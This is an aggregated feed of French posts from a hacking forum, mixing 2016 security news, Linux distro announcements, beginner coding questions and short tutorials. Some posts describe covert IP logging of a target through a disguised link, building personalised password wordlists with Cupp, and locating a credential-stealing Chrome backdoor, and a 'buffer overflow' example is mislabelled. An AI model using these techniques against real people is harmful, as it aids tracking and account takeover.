En effet, un compte Twitter au nom de Lizard Squad revendiquait celles-ci.

Ce qui est étrange c'est que le groupe Lizard Squad a normalement été dissous en 2014.
Est-ce donc des résistants à cette dissolution ou au contraire d'autres personnes se cachant sous l'appellation de l'ex groupe ? Personne ne le sait.

Ce que l'on sait par contre, c'est que les auteurs s'exposent à de lourdes peines en cas d'arrestation.

Source :
http://ift.tt/1Qdzuts


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1W6ewDR
via IFTTT

News Une backdoor opensource pour Chrome


Un informaticien Français a récemment libéré, en Open Source, un plugin Chrome permettant de backdoorer ce navigateur Web.

Le but de notre hacker était d'explorer de nouvelles possibilités d'infection d'une machine afin de récolter des données sur les utilisateurs. Il s'est alors attaqué au logiciel le plus utilisé au monde, le navigateur Web.

La backdoor est contrôlable à distance, via une interface web.
Au programme, vol d'identifiants, de mot de passe, de conversations Facebook, ...
De plus, le code source de la backdoor peut être modifié via l'interface Web.
Celle-ci se mettra alors directement à jour.

Le développeur a bien entendu pensé à écrire un anti Chrome backdoor qui devrait sortir prochainement.

Si vous êtes intéressés, sachez que la législation française ne nous permet pas de vous donner l'URL du projet.
Cependant et comme toujours, Google est votre ami.

Source : http://ift.tt/1W6ewDH


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Qdzuto
via IFTTT

News Les États Unis lancent des cyber attaques contre l'état islamique


Quand les États Unis se lancent dans un projet, ils ne le font pas à moitié.
Cela s'est vu avec les révélations sur PRISM et ses compagnons. Ils avaient décidés d'espionner les citoyens et bien ils l'ont fait dans le monde entier.

Pour le moment, une des actions des États Unis dans le monde, c'est de s'attaquer au groupe terroriste état islamique.
Cependant, cette fois, en dehors de sempiternels bombardements, ils ont décidés de se lancer dans un nouveau vecteur de répression. L'informatique.

De ce fait, les États Unis ont décidé de lancer leurs premières Cyber bombes.
Et d'après eux, ça fonctionne plutôt bien.

Quant à la définition de ce qu'ils appellent un cyber bombes, on ne la trouve nulle part.
Elles pourraient consister en attaques massives par Déni de service ou encore en virus tels que Stuxnet.

Espérons en savoir plus bientôt.

Source :
http://ift.tt/1W6ewnf


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Qdztpj
via IFTTT

News L'Hacktiviste Lauri Love devra t'il donner ses clefs de déchiffrement ?


Lauri Love est un citoyen britannique et un hacktiviste politique connu pour avoir piraté le FBI, la NASA, la réserve fédérale de New York lors d'une opération (#OpLastResort) en lien avec le groupe Anonymous.

Love a donc été arrêté à son domicile et lors d'une audition au tribunal, il lui a été demandé de livrer les clefs de chiffrement permettant d'accéder aux fichiers cryptés de ses ordinateurs. Ce que Love a refusé de faire.

La NCA (National Crime Agency) du royaume unis a donc opté pour une nouvelle stratégie, il cherche à obtenir une ordonnance de la court obligeant Love a déchiffrer ses données. En effet, avec cette ordonnance et si Love continue à refuser, il sera inculpé pour outrage à la court.

Love se bat également pour éviter l'extradition vers les États Unis où il risque une peine pouvant aller jusqu'à 99 ans de prison pour ses piratages.

Pour information, les données de notre hacktiviste sont apparement encryptée avec TrueCrypt.
Ce système semble donc toujours poser des problèmes aux agences de renseignement souhaitant le casser, ce qui est bon à savoir.

Vous voulez en savoir plus ?
C'est par ici :
Qu'est-ce que l'hacktivisme ?
L'OpLastResort Quésaco ?


Source : http://ift.tt/1W6ewn9


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Qdztpf
via IFTTT

News Ransomwares - La France dans les 10 pays les plus cybercriminels


Une étude dévoilée par la société américaine de sécurité informatique Symantec, démontre que la France est de retour dans les 10 pays à cybercriminalité les plus active, au coté de la Chine et des États-Unis. Cela s'explique en grande partie par l'augmentation considérable de ransomwares. En effet, ces derniers représenteraient plus de 391 000 attaques en 2015.

Marc Preuss, développeur au sein de Kaspersky Lab déclare :

Citation:

2016 est probablement l’année du ransomware. Au cours du seul mois de février, nous avons déjà dénombré autant de tentatives d’attaques contre nos clients que lors des cinq mois précédents cumulés
Les ransomwares sont très en vogue en ce moment, si vous êtes infecté, il existe une solution: ID Ransomware


Source: datasecuritybreach


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1W6ew6N
via IFTTT

News Badlock : une vulnérabilité critique de SMB patchée


Pour ceux qui ne connaissent pas SAMBA, c'est un protocol local permettant le partage de fichiers, de dossiers et d'imprimantes.

Récemment, une faille critique a été trouvée dans l'implémentation Windows de Samba pour les versions suivantes :
  • 3.6.X
  • 4.0.X
  • 4.1.X
  • 4.2.0-4.2.9
  • 4.3.0-4.3.6
  • 4.4.0


Cette faille permet d'opérer des attaques de type man in the middle et DOS sur les serveurs Samba.
Les détails techniques ont étés dévoilés cette semaine en même temps que le patch corrigeant le problème.

Pour plus d'informations :
http://badlock.org/
http://ift.tt/1W6etrE


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Qdztpb
via IFTTT

vendredi 15 avril 2016

Kal linux en version légère avec Openbox

Bonjour à tous !! récemment j'ai découvert une distribution clone de Kali linux avec Openbox comme manager de fenêtres qui s'appelle Kalibang qui est developpé par un français pour vos vielles machines .

Kali linux

J'ai l'impression que quand Kali linux est passé en version 2.0 il est devenu gourmand en mémoire sur mon netbook Asus alors j'ai essayé de trouver une alternative à mon goût jusqu'a je tombe sur Kalibang .

Télechargement

Si vous voulez le télecharger c'est ici : http://ift.tt/1SQ07Xc
choisissez l'architecture et la version vous convenant et lancez le télechargement .

la version 1.0
1414251129_capture_d_ecran_-_24102014_-_23_05_49.jpg

Merci Coyotus !!

site du projet : http://kalibang.org/


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1SQ07Xg
via IFTTT

Presentation

Salut ! à tous !

Je suis un nouveau venu et aussi un débutant... J'ai entendu parler de ce forum et j'ai été attiré. j'aimerais apprendre un peu plus avec vous. Merci ! de votre accueil !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1NsyNMU
via IFTTT

livre How to Hack Computers, Basic Security and Penetration Testing



from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1SeFeYm
via IFTTT

jeudi 14 avril 2016

News ID Ransomware - Diagnostiquez vos ransomwares


En ce moment, les ransomwares envahissent le net, avec des techniques toujours plus redoutables, évoluant chaque jour. Contrer ces ransomwares est très difficile, et bien souvent la victime perd ses données, ou passe à la caisse.

La solution à tous vos problèmes s’appelle ID Ransomware. Ce service en ligne vous propose d'uploader un de vos fichiers chiffrés, ou le fichier contenant le message de la rançon, et ainsi d'identifier le ransomware qui vous à infecté.


ID Ransomware est capable d'identifier ces 52 ransomwares:

Citation:

7ev3n, Booyah, Brazilian Ransomware, BuyUnlockCode, Cerber, CoinVault, Coverton, Crypt0L0cker, CryptoFortress, CryptoHasYou, CryptoJoker, CryptoTorLocker, CryptoWall 2.0, CryptoWall 3.0, CryptoWall 4.0, CrySiS, CTB-Locker, DMA Locker, ECLR Ransomware, EnCiPhErEd, Hi Buddy!, HOW TO DECRYPT FILES, HydraCrypt, Jigsaw, JobCrypter, KeRanger, LeChiffre, Locky, Lortok, Magic, Maktub Locker, MireWare, NanoLocker, Nemucod, OMG! Ransomcrypt, PadCrypt, PClock, PowerWare, Radamant, Rokku, Samas, Sanction, Shade, SuperCrypt, Surprise, TeslaCrypt 0.x, TeslaCrypt 2.x, TeslaCrypt 3.0, TeslaCrypt 4.0, UmbreCrypt, Unknown, VaultCrypt

Ce service ne vous permet pas de déchiffrer vos données directement, mais il vous indiquera si certains ransomwares peuvent l’être gratuitement.


Source: korben


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1qXsyfJ
via IFTTT

Que pouvez vous tirez d'un lien url ???

Que pouvez vous tirez d'un lien?!!


Salut Salut j'espère que vous allez bien :D

tout d'abord ce sujet n'est pas très compliquer on est dans les bases mais il peut le devenir avec l'aide de votre savoir bien évidemment :cool:

Pour commencez imaginons un scénario White hat (mouahhh)

Vous devez retrouver un pédophile (max d'infos) pédophile un peut limiter intellectuellement vous avez son adresse email !!!

Que faites vous ?


Vous lui envoyez un mail contenant un lien , vous utilisez du social engennering Merci kevin Mitnick

Voici la partie qui deviens cool pour le lien, on peut utiliser

http://blasze.com/

En deux mots :rolleyes: son fonctionnement vous copier votre lien vers n'importe quel site dans le champ submit vous recevez une url blaze.tk/xxxx avec un code d’accès et vous attendez que le pédophile clic sur le lien

Quels sont les infos que vous allez obtenir!

Et bien la date (ouais), Son adresse ip (bon sachant que c'est pas super exacte),Son user-agent (oh yeah yeah yeah surtout si c'est internet explorer oh yeah yeah), Son FAI (bof,bof).

Pour ceux qui savent pas c'est quoi User-agenthttp://ift.tt/1SEuH5B

Voir les infos que peut donner son navigateurhttp://ift.tt/qbwDN5

je sais c'est pas exceptionnelle :p

Maintenant c'est votre tour lâchez vous si vous devez partager quelque chose pas de problèmes (spread,ect)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1SEuFe6
via IFTTT

News Jigsaw : Un nouveau ransomware sadique

Bnojour a tous , a peine que des chercheurs en securité ont trouvé un méthode de désinféction pour Locky , un nouveau ransomware nommé "Jigsaw"(Jigsaw est le méchant de la saga d'horreur Saw ) vient d'apparaitre sur windows , mais celui-ci est plus sadique que les autres , car en plus de crypter les fichiers il est doté d'un compte a rebours , si la victime ne paye pas la rançon de 150 $ en bitcoins au bout de 1h 30 , un de ses fichiers sera supprimé , ainsi au bout de 3h , 2 fichiers seront supprimés ... Si la victime essaye de décrypter ses donnés ou tuer le ransomware , Jigsaw est capable de supprimér tout le disque dur ... A l'heure ou j'ecris des Des spécialistes en sécurité ont trouvé une solution pour déchiffrer les fichiers sans avoir à payer.



Décrypter les fichiers
L’utilisateur victime de Jigsaw doit ouvrir le gestionnaire de tâches de Windows et stopper les processus firefox.exe et drpbx.exe pour éviter d’autres suppressions de fichiers, rapporte Lawrence Abrams. Il faut ensuite lancer l’utilitaire de Windows msconfig et supprimer l’entrée de démarrage qui pointe vers %UserProfile%\AppData\Roaming\Frfx\firefox.exe. Cette opération devrait arrêter le processus de destruction de fichiers et empêcher le malware de se relancer.

Les utilisateurs devront ensuite télécharger l’utilitaire Jigsaw Decrypter hébergé sur BleepingComputer.com et déchiffrer les fichiers. Une fois cette opération effectuée, Abrams recommande de télécharger un logiciel anti-malware et de lancer un scan du système.

Note de fin : protégez bien vos donnés , sauvegardez-les sur un support externe ou dans le cloud. Ne cliquez pas sur des fichiers .exe suspects . Meme si les fichiers cryptés par Jigsaw ont été décryptés , sa méthode de compte a rebours est terrifiante . Bientôt il pourrait y avoir un ransomware bien plus coriace à tuer utilisant cette
méthode .

jigsaw.jpg



liens externes:
http://ift.tt/23xcP8g
http://ift.tt/1Q98ACJ
http://ift.tt/23xcP8i
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/23xcNx7
via IFTTT

mercredi 13 avril 2016

Anonyme77

Bonjour à tous !

Depuis aujourd'hui même, l'équipe d'Hackademics m'a fait l'honneur de m'accueillir en son sein.

La plupart d'entre vous me connait comme membre du forum et bien dorénavant, je donnerai également un coup de main pour la modération !
J'aiderai donc à faire respecter la Charte de notre beau forum pour que tout se passe au mieux.
Mais je suis certain que ça ira, nous sommes une bonne communauté.

À mon niveau, je suis un éternel étudiant, un amoureux de connaissances en tout genre, en particulier en infosec.
Je ne suis pas parfait, loin de là, mais comme vous j'apprends et je fais mon petit chemin dans ce domaine.

Vous avez une question, une remarque, un suggestion ? N'hésitez pas à m'écrire par MP, Mail ou tout autre moyen de communication.

À bientôt sur le forum !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1VlQKEJ
via IFTTT

mardi 12 avril 2016

Importance des champs cachés en html

Salut je suis Rodrigue Daniel

En html, je souhaiterais savoir concrètement l'importance des champs cachés (<input type="hidden" />).
En effet j'ai suivi que certaines personnes l'utilisent pour stocker des constances au niveau formulaire.
Alors pourquoi utiliser une technique pareil pourtant on peut bien déclarer une constance en php ? En plus
en parlant de cacher, le code php n'est pas visible côté client ou alors cette technique de champs cachés n'est plus d'actualité.
Bref je souhaiterais un éclaircissement.

MERCI


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1SvNDDA
via IFTTT

Remarque troublant sur l'utilisation d'un fichier externe en javascript

Salut je suis Rodrigue Daniel

J'ai fait un constat en javascript dernièrement : avec l'utilisation d'un fichier <.js> externe lorsque j'agis sur les événements, l'élément html sur lequel je veux déclencher une action, lorsque je le met avant la définition de la ligne javascript pour ce fichier externe (<script src="fichier.js"></script>), mon code JS fonctionne sans problème mais lorsque l'élément est situé après alors rien ne fonctionne. J'utilise HTML5 et Javascript.Mais j'ai utilisé cette méthode sans
problème avec certaines syntaxes en JS.

Voici deux mini-codes (html5 et javascript) pour éclaircir mon problème :
Code HTML:

<!DOCTYPE html>
<html>
<head>
</head>
<body>
<h1 id="titre"> C'est genial </h1>
<script src="fichier.js"></script>
<div >
<span id="capt">Cliquez-moi</span>
</div>
</body>
</html>

Code:

var element1 = document.getElementById('titre');
element1.addEventListener('click', function(){
alert("Bonjour");
}, false);

var element2 = document.getElementById('capt');
element2.addEventListener('click', function(){
alert("Bonjour");
}, false);

Avec l'objet element1 : ça fonctionne, mais avec l'objet element2 rien ne fonctionne.
SVP éclaircissez moi.
MERCI


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1RQVKyz
via IFTTT

Différence de syntaxes en PHP

Salut je suis Rodrigue Daniel

SVP je souhaiterais savoir la différence entre ces deux syntaxes en php

Code PHP:

<?php if($variable == "valeur"){...} ?>
<?php 
if("valeur" == $variable){...} ?>

ou alors il n'y a pas de différence. SVP Je souhaiterais un éclaircissement.
MERCI


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1T14v8e
via IFTTT

lundi 11 avril 2016

News L'actualité infosec de la semaine - 3ème numéro (4 au 10 avril)

L'actualité infosec de la semaine - 3ème numéro (4 avril au 10 avril)


Subgraph - L'OS entièrement sécurisé et open source

Deux ans. C'est le temps pris par l'équipe de Subgraph pour sortir une version alpha de son OS. Développé pour vous permettre de travailler en toute sécurité, l'OS se veut libre et opensource. Au programme, un client mail intégré et sécurisé, résistance aux Zero Day, aux keyloggers, aux buffer overflow et aux malwares, connexion cryptées... A tester.




Ubuntu patch des vulnérabilités dans le noyau Linux

Cette semaine, Ubuntu a publié des patch de sécurité colmatant des failles(3)dans leur implémentation du noyau Linux. Ces trois failles permettaient des attaques par déni de service. Les utilisateurs sous Ubuntu 14.04 ou tout autre noyau dérivé sont invités à installer ces patchs de sécurité.




Firefox - Une inquiétante faille découverte parmi les extensions

Durant la Black Hat Asia, quatre chercheurs ont démontrés l'existence d'une faille qu'ils sont par la suite nommée "Extension-reuse vulnerability" parmi les extensions Firefox. En effet, une extension sous Firefox peut faire appelle aux fonctionnalités d'une autre, et ce, à des fins malveillante. Firefox annonce la correction de la faille dans l'année.




Base de données de 49 millions de ressortissants Turcs piratée

Depuis le 3 avril, un hacktiviste Turc met en ligne une base de données comportant les informations personnelles de 49,611,709 citoyens Turcs. Ces informations personnelles sont très précises, et comporte notamment l'identité, l'adresse, le numéro de téléphone... L'hacktiviste revendique une motivation politique, en ferveur opposition avec le président Erdogan.




La société Hacking Team a perdu son droit de vendre des malwares hors UE

La Hacking Team, une société italienne notamment connue pour sa vente de spyware aux gouvernements, mais également pour son piratage, en 2015, rappelons quand meme que 400Gb de ses données confidentielles circulent toujours sur le web. Et bien 1an après son piratage la société se relance en passant un contrat avec le FBI. Cependant, le ministère italien du développement économique vient de retirer à la société son droit de vendre ses logiciels de surveillance à des pays hors union européenne. Affaire à suivre.



Une nouvelle faille zero-day dans flash

La société Adobe a prévenu cette semaine qu'elle compte d'ici peu mettre en ligne une mise à jour permettant de corriger une faille zero-day dans Adobe Flash. La faille en question permet de faire crash votre navigateur et de prendre le contrôle de son processus afin d'exécuter du code arbitraire sur votre machine. Donc, si vous êtes sous Windows, restez bien attentifs à vos mise à jour.



Un piratage informatique à l'origine #PanamaPapers ?

Le Panama Papers, c'est le scandale qui explose en ce moment qui révèlent un vaste système d’évasion fiscale mondial mis en place par le cabinet d’avocats panaméen Mossack Fonseca, via des sociétés écrans. Mais une grande question persiste encore concernant l'origine de la fuite : un lanceur d’alerte ? Un pirate informatique ? Car Mossack Fonseca, la société inculpée, affirme avoir été victime d’un piratage informatique opéré à partir de serveurs étrangers. A l'heure actuelle , une vulnérabilité au sein de leur serveur mail est suspectée comme étant l’origine du piratage si toutefois il y a eu piratage externe. La justice le dira en temps et en heure, le dossier étant déjà en cours d’examen.



Signal - Une version sur Descktop enfin disponible

Le logiciel Signal d'OpenWhisperSystems qui permet de passer des coups de fil et d'envoyer des SMS de manière totalement chiffrée vient de sortir une version beta pour desktop. Le logiciel est en réalité une extension qui se base sur Chrome, qui vous permet de communiquer directement depuis votre navigateur. Seule ombre au tableau: Contrairement à la version mobile, qui permettait d'envoyer des messages à des personnes ne possédant pas l'application, Signal pour desktop permet uniquement de recevoir et d'écrire à vos contacts qui ont eux-mêmes Signal.



By Bioshock, Anonyme77 & _47


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Q3YBii
via IFTTT

News Une nouvelle faille zero-day dans flash


Restez bien attentif à vos updates mensuel d'Adobe Flash.

En effet, la société a prévenu cette semaine qu'elle compte d'ici peu mettre en ligne une mise à jour permettant de corriger une faille zero-day dans Adobe Flash.

Cette faille permet de faire crasher votre navigateur et de prendre le contrôle de son processus afin d'exécuter du code arbitraire sur votre machine.

Pour ce faire, pas besoin de clic sur un bouton ou d'autres actions.
Visiter une page piégée est suffisant.
Cette attaque cible principalement les utilisateurs Windows.

Si vous êtes concernés soyons donc très attentifs et on ne le dira jamais assez, gardez vos logiciels à jour.

Sachez toutefois qu'une part grandissante de l'internet tente de se passer de Flash.
Si vous êtes intéressés, voici quelques liens :
  1. http://ift.tt/1Q3YB1L
  2. http://ift.tt/1Q3YB1N
  3. http://ift.tt/1VPtUnH




Source : http://ift.tt/1VPtSfG


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Q3YCCA
via IFTTT

News La société Hacking Team a perdu son droit de vendre des malwares hors UE


La société Italienne Hacking Team est assez connue dans le monde de la sécurité informatique.
En voici les raisons :
  1. Elle vend des malwares de surveillance aux gourvernements (spécialement dans des pays pauvres)
  2. Elle a été hackée l'année passée et 400Gb de ses données confidentielles circulent sur le web
  3. Elle a des contrats de surveillance avec le FBI et la DEA


Un an après son piratage, la société a décidé de reprendre ses activités en aidant le FBI a trouver des solutions pour casser les systèmes de chiffrements.

Cependant, le ministère italien du développement économique vient de retirer à la société son droit de vendre ses logiciels de surveillance à des pays hors union européenne.
Pour être plus exact, la société devra en fait demander une autorisation au cas par cas.
Autorisation qui pourra bien entendu être refusée.

Le seront-elles ou pas ? L'avenir nous le dira cependant, une chose est certaine, la société italienne a des alliés puissants.

Source : http://ift.tt/1Q3YB1F


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1VPtRsj
via IFTTT

News Ubuntu patch des vulnérabilités dans le noyau Linux


Cette semaine, Ubuntu a publié des patch de sécurité colmatants des failles dans leur implémentation du noyau Linux.

La première faille est de type use-after-free.
Cette faille pouvait être utilisée pour crasher le système via une attaque par déni de service.
Elle pouvait également servir à exécuter du code arbitraire sur le système.

La seconde faille concernait la gestion des fichiers et permettait également une attaque par déni de service.

Une troisième faille par déni de service a également été découverte.

Les utilisateurs sous Ubuntu 14.04 ou tout autre noyau dérivé sont invités à installer ces patchs de sécurité.

Source : http://ift.tt/1Q3YCmi


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1VPtSfC
via IFTTT

News Firefox - Une inquiétante faille découverte parmi les extensions



Firefox à beaucoup aider à développer les extension. Ces petits compléments qui viennent ajouter des fonctionnalité à votre navigateur. Blocage de pub, prise de note, stockage de mots de passe... Beaucoup d'entre nous les utilisent couramment. Le modèle utilisé par Firefox se nomme XPCOM, pour Cross Platform Component Object Model. C'est lui qui va définir les règles, les capacités et les limites des extensions. Le problème c'est qu'une faille à été découverte dans le XPOCM. Elle permet aux extensions d'appeler les fonctionnalités d'une autre, ce qui n'était pas prévu.

Quatre chercheurs on présentés leurs travaux durant la conférence Black Hat Asia. Ils ont démontré que les extensions pouvaient en effet faire appel à des fonctionnalités précises dans d’autres pour servir de sombres desseins. Une extension peut prévoir de tels mécanismes, sans les incorporer elle-même. Conséquence, elle passe tous les tests de validation, dont ceux de sécurité. La faille à été baptisée "Extension-reuse vulnerability" par les chercheurs. Ces derniers on put mettre en ligne une application nommée "ValidateThisWebsite " son but premier était de valider des sites web sur leurs fiabilité. Mais elle contient également un appelle à l'application NOScript, dont elle se sert pour ouvrir des onglets sur une URL précise. De la, on comprend l'ampleur du problème. En effet, un utilisateur peut télécharger une extension inconnue, depuis une source inconnue et se retrouver avec le téléchargement d'un malware sur sa machine.

Les chercheurs indiquent: « Les extensions peuvent souvent accéder à des informations privées de navigation telles que les cookies, l’historique et les mots de passe, et même des ressources système. Par exemple, Firefox expose une API riche à ses extensions à travers XPCOM qui permet un accès presque illimité aux ressources système sensibles, comme le système de fichiers et le réseau. En conséquence, les extensions malveillantes, ou les attaques dirigées contre les extensions légitimes, posent un risque significatif de sécurité pour les utilisateurs.
»

Tout les grands noms sont touchés hormis AdBlock. Sinon, on peut cité NoScript, VidéoDownloadHelper, WOT... Mozilla est au courant et Nick Nguyen, le vice-président déclare: « La manière dont les extensions sont implémentées dans Firefox aujourd’hui permet le scénario présenté à la Black Hat Asia ». Il ajoute qu'une nouvelle infrastructure arriverait dans l'année, permettant d'isoler les extension, et ainsi, éviter le problème. Affaire à suivre.

Je vous laisse avec le rapport des chercheurs: http://ift.tt/1Q3YB1x



Source: nextinpact


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Q3YB1z
via IFTTT

News Base de données de 49 millions de ressortissants Turcs piratée


Depuis le 3 avril, un hacktiviste(qui n'a pas signé son acte) diffuse une base de données comportant les informations personnelles de 49,611,709 citoyens Turcs (en 2015, le pays comptait 79 millions de citoyens).

Ces données personnelles comportent :
  • L'identité
  • L'adresse
  • La filiation familiale
  • La date et le lieu de naissance
  • Le numéro social d'identification


L'hacktiviste dit avoir fait cela pour réveiller les turcs sur le fait que leur président, le président Erdogan, serait en train de détruire leur pays.
Il ajoute également que faire un décalage de bit ne protège pas un système informatique.

Il termine en ajoutant, pour les américains, qu'ils ne devraient pas élire Trump qui est, d'après lui, encore pire que le président Erdogan.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Q3YCmg
via IFTTT

News Subgraph - L'OS entièrement sécurisé et open source


Après deux ans de travail acharné, l'équipe de Subgraph sort une version alpha de son OS.

Subgraph est un OS développé pour vous permettre de communiquer et de travailler en toute sécurité. Adieu les gouvernement et les entreprises multinationales. Subgraph implémente notamment sa propre version d'OpenPGP et un client mail de son cru pour communiquer en toute sécurité.

Ce projet, qui se veut indépendant est financé par l'Open Technology Fund. Subgraph est conçu pour résister aux Zero Day, aux keyloggers, aux buffer overflow et aux malwares grâce à un système de conteneurs qui isole les applications du système de fichiers et à son kernel Gr-Security. La connexion à Internet se fait uniquement via TOR, et tout ce qui rentre et qui sort est contrôlé par un proxy et un firewall. Le système de fichier est chiffré et la mémoire vive est vidée à chaque extinction de la machine pour éviter les attaques de type Cold Boot.

Voici un schéma qui nous montre l'architecture de Subgraph:


Je pense le tester dans les mois à venir, je vous tiens au courant :)

Source: korben, helpnetsecurity


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Q3YB1v
via IFTTT

dimanche 10 avril 2016

Vos lectures du moment

Vous ne le savez probablement pas, mais je suis un grand fan de lecture.
Quand j'en ai le temps, je lis deux livres par semaine.

En attaquant Millenium 4 ce matin, je me demandais quels sont les lectures de mes amis Hackademicien.
Aimez vous lire déjà ?

Bonne journée !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1Yn6JjS
via IFTTT

samedi 9 avril 2016

Simple buffer overflow en python

Bonjour !! voici un simple buffer overflow exploitable en python .

Code HTML:

print (""" _          _                                _
    /\      | |        (_)                              | |
  /  \  __| |_ __ ___  _ _ __    _ __  __ _ _ __  ___| |
  / /\ \ / _` | '_ ` _ \| | '_ \  | '_ \ / _` | '_ \ / _ \ |
 / ____ \ (_| | | | | | | | | | | | |_) | (_| | | | |  __/ |
/_/    \_\__,_|_| |_| |_|_|_| |_| | .__/ \__,_|_| |_|\___|_|
                                  | |                     
                                  |_|                     
""")


password = input(" password: ")
if len(password) >= 15:
        print  ("Acces granted !! Welcome admin ")
elif len(password) < 15 :
        print ("acces denied ")

Code HTML:

chmod +x buffer_overflow.py
Code HTML:

python3 buffer_overflow.py


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1SWr79S
via IFTTT

Lionsec Linux : Distribution pour les tests d'intrusion

Lionsec Linux


Bonjour a tous ! aujourd'hui je vais vous présenter une distribution pour les tests d'intrusion made in spain .
elle contient tout les outils de Kali linux et d'autres outils ajoutés .. vous pouvez la télecharger ici http://ift.tt/1SWra5P

Note:
-Pour l'instant il existe qu'une version 64 bits
-le lien de télechargements est un lien MEGA , il n'existe pas de lien torrent .
-la version 5.0 est trés lourde pour les netbooks , préferez la version 3.1 http://ift.tt/1SWr6Tu
-le bureau est tres beau .

lionseclinux5-2.jpg


lionseclinux5-3.jpg


lionseclinux5-5.jpg
Images jointes


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1S9h30o
via IFTTT

Tutoriel Générer des wordlists personnalisés avec Cupp

Bonjour â tous ! Aujourd'hui je vais vous montrer comment générer des wordlists personnalisés a l'aide de Cupp un script python .

Pourquoi des wordlists personnalisés ?

La plupart du temps lorsque nous voulons tester la robustesse d'un mot de passe nous télechargons des dictionnaires avec par exemple , les mots de passes les plus utilisés ou les mots les plus utilisés , mais ces wordlists ne sont pas efficaces â 100% , alors nous allons nous tourner vers Crunch pour générer des dictionnaires qui peuvent peser des dizaines de GO ou meme des TO avec tout les combinaisons possibles selon le charset !! Autant dire que ca va peut durer une éternité .. Alors nous pouvons nous tourner vers Cupp qui selon les données de la personne va générer une wordlist

Exemple:

Code HTML:

Billsmith123
Code HTML:

BilltheBoss123
Code HTML:

Bill1980
Utilisation
1.commencer a télecharger Cupp ici -----> http://ift.tt/1SmKFkJ
2.lancez-le
Code HTML:

chmod +x cupp.py
Code HTML:

python cupp.py
3.Cupp est fait de façon interactive , il vous demandera des informations (NOM,PRENOM,AGE,SURNOM,etc) au fur et a meusure , puis enregistrera les combinaisons dans une wordlist !!

liens externes:
video:https://www.youtube.com/watch?v=ANXYxDBzleg


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1VddabD
via IFTTT